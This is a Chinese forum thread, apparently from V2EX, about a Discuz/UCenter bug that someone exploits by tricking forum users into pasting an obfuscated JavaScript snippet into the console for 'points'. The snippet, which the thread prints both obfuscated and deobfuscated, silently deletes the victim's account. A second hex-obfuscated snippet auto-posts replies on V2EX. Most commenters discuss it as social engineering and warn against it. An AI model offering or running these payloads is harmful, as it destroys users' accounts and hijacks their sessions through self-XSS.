discuz 漏洞真 j8 多有人在我论坛搞事情。。。传播一段 js 把我论坛搞炸了

This topic created in 2749 days ago, the information mentioned may be changed or developed.

这两天有人在我站水帖。。。。。告诉别的用户在 console 执行一段脚本能领到积分。。结果他们自己账号变得乱七八糟的了。。。
废话不说。。。上代码你们自己看看

location['\x68\x72\x65\x66']=((d=(await(await fetch("\x2e\x2f\x68\x6f\x6d\x65\x2e\x70\x68\x70\x3f\x6d\x6f\x64\x3d\x73\x70\x61\x63\x65\x63\x70\x26\x61\x63\x3d\x61\x76\x61\x74\x61\x72",{credentials:'\x69\x6e\x63\x6c\x75\x64\x65'}))['\x74\x65\x78\x74']())['\x6d\x61\x74\x63\x68'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['\x72\x65\x70\x6c\x61\x63\x65']('\x69\x6d\x61\x67\x65\x73\x2f\x63\x61\x6d\x65\x72\x61\x2e\x73\x77\x66\x3f','\x3f\x6d\x3d\x75\x73\x65\x72\x26\x61\x3d\x64\x65\x6c\x65\x74\x65\x26'))&&confirm('\u7eff\u5b9d\u77f3'))?d:'';

X61

x65

x63

x6d

56 replies • 2020-11-29 13:10:48 +08:00

Event

Nov 11, 2018 via Android

具体账号发生了什么神奇的变化。。你们自己试试看吧我很无奈。。

Event

Nov 11, 2018 via Android

而且貌似不是软层的。。。直接从 sql 层干掉了？

Event

Nov 11, 2018 via Android

哦对。。输完后退出帐号重新登录才能看到效果

chinvo

Nov 11, 2018 via iPhone

@Livid

suit

Nov 11, 2018

没有变化

Event

Nov 11, 2018 via Android

@suit 重新登录看看你就知道了

Event

Nov 11, 2018 via Android

@chinvo
emmmm 咋了这里不允许讨论 bug 吗。。。

suit

Nov 11, 2018

@Event 已经重登了

Event

Nov 11, 2018 via Android

@suit 我在 dz 的 oschina 里面找到了 issue。。。貌似是个 ucenter 的 bug

Event

Nov 11, 2018 via Android

@suit 貌似是要 chrome 才行会弹出一个确认框。。

chinvo

Nov 11, 2018 via iPhone

@chinvo #4 抱歉，你这种描述方式太像那些 6 和彩的假新闻广告了，一时误认

ScotGu

Nov 11, 2018

@Event #7 并不是不允许讨论 BUG。
而是你的讨论方式有点操蛋。

在 DZ 论坛执行这段代码基本就是“自杀”。而你怂恿他人去尝试执行。并且未加任何警示标识和标识。
V2 是一个被秒收录的站点，很多小白来这里学习，如果小白好奇去执行了这段脚本，由此造成的后或你会负责么？

@Livid 建议屏蔽危险代码。

t6attack

Nov 11, 2018

location['href'] = ((d = (await(await fetch("./home.php?mod=spacecp&ac=avatar", {
credentials: 'include'
}))['text']())['match'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['replace']('images/camera.swf?', '?m=user&a=delete&')) && confirm('绿宝石')) ? d : '';

t6attack

Nov 11, 2018

让用户自己执行动作代码，这，，这算漏洞？！下面代码可以在 v2 执行
$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x76\x61\x6c"]("\u6240\u4ee5\u4f60\u4eec\u5230\u5e95\u5acc\x4a\x53\u6743\u9650\u592a\u5927\u8fd8\u662f\u592a\u5c0f\u4e86\uff1f\uff1f");$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x70\x61\x72\x65\x6e\x74"]()["\x73\x75\x62\x6d\x69\x74"]();

mengyaoss77

Nov 12, 2018

所以你们到底嫌 JS 权限太大还是太小了？？

dot2017

Nov 12, 2018

这个 bug 老早就有了，利用 uc 头像删除自己的账号。临时解决办法是切换到 H5 头像模式，X3.4 自带了

Event

Nov 12, 2018

@ScotGu 是的。。很有危害性所以我混淆了啊防止别人乱改

@t6attack 重要的不是执行是这个功能毁灭性的

Event

Nov 12, 2018

@mengyaoss77 是程序权限没控制好

Perry

Nov 12, 2018 via iPhone

这是 social engineering 不是 bug

mengyaoss77

Nov 12, 2018

@Event #18 这是我执行 14 楼的代码自动回复的

Event

Nov 12, 2018

@Perry 感觉小白不清楚会出事情

airyland

Nov 12, 2018

所以你们到底嫌 JS 权限太大还是太小了？？

airyland

Nov 12, 2018

试了楼上的代码，自动发出回复了。。

crab

Nov 12, 2018

https://imgur.com/4so7bfg

crab

Nov 12, 2018

KasuganoSoras

Nov 12, 2018 via Android

这个 bug 老早就有了，我成功删了自己在很多论坛的账号。
不过我现在都自己开发论坛了，不用 Discuz

penisulaS

Nov 12, 2018

所以你们到底嫌 JS 权限太大还是太小了？？

murmur

Nov 12, 2018

为什么那么多网站都在 console 里打东西提醒用户不要执行陌生人发来的代码

ThirdFlame

Nov 12, 2018

人肉型 CSRF

lixueyu001

Nov 12, 2018

所以你们到底嫌 JS 权限太大还是太小了？？

dumbass

Nov 12, 2018

所以你们到底嫌 JS 权限太大还是太小了？？

v9ex

Nov 12, 2018

$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x76\x61\x6c"]("\u6240\u4ee5\u4f60\u4eec\u5230\u5e95\u5acc\x4a\x53\u6743\u9650\u592a\u5927\u8fd8\u662f\u592a\u5c0f\u4e86\uff1f\uff1f");$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x70\x61\x72\x65\x6e\x74"]()["\x73\x75\x62\x6d\x69\x74"]();

Removable

Nov 12, 2018

所以你们到底嫌 JS 权限太大还是太小了？？

respect11

Nov 12, 2018 via iPhone

所以你们到底嫌 JS 权限太大还是太小了？？

s527332935

Nov 12, 2018

所以你们到底嫌 JS 权限太大还是太小了？？

Lebal

Nov 12, 2018

所以你们到底嫌 JS 权限太大还是太小了？？

FakeLeung

Nov 12, 2018

location['href']=(
(d=(await(await fetch("./home.php?mod=spacecp&ac=avatar", {credentials: 'include'})['text']())['match'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['replace']('images/camera.swf?', '?m=user&a=delete&')&&confirm('绿宝石'))?d:'';